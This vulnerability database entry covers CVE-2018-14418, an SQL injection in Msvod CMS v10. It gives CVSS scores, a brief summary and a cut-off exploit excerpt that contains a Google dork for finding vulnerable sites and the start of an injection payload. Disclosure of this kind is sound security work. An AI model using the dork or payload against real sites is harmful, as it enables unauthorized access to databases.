9.8
CVSSv3

CVE-2018-14418

Published: 20/07/2018 Updated: 17/09/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

In Msvod Cms v10, SQL Injection exists via an images/lists?cid= URI.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

msvod msvod cms 10

Exploits

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: wwwmsvodcc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : wwwwtfsecorg/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractv ...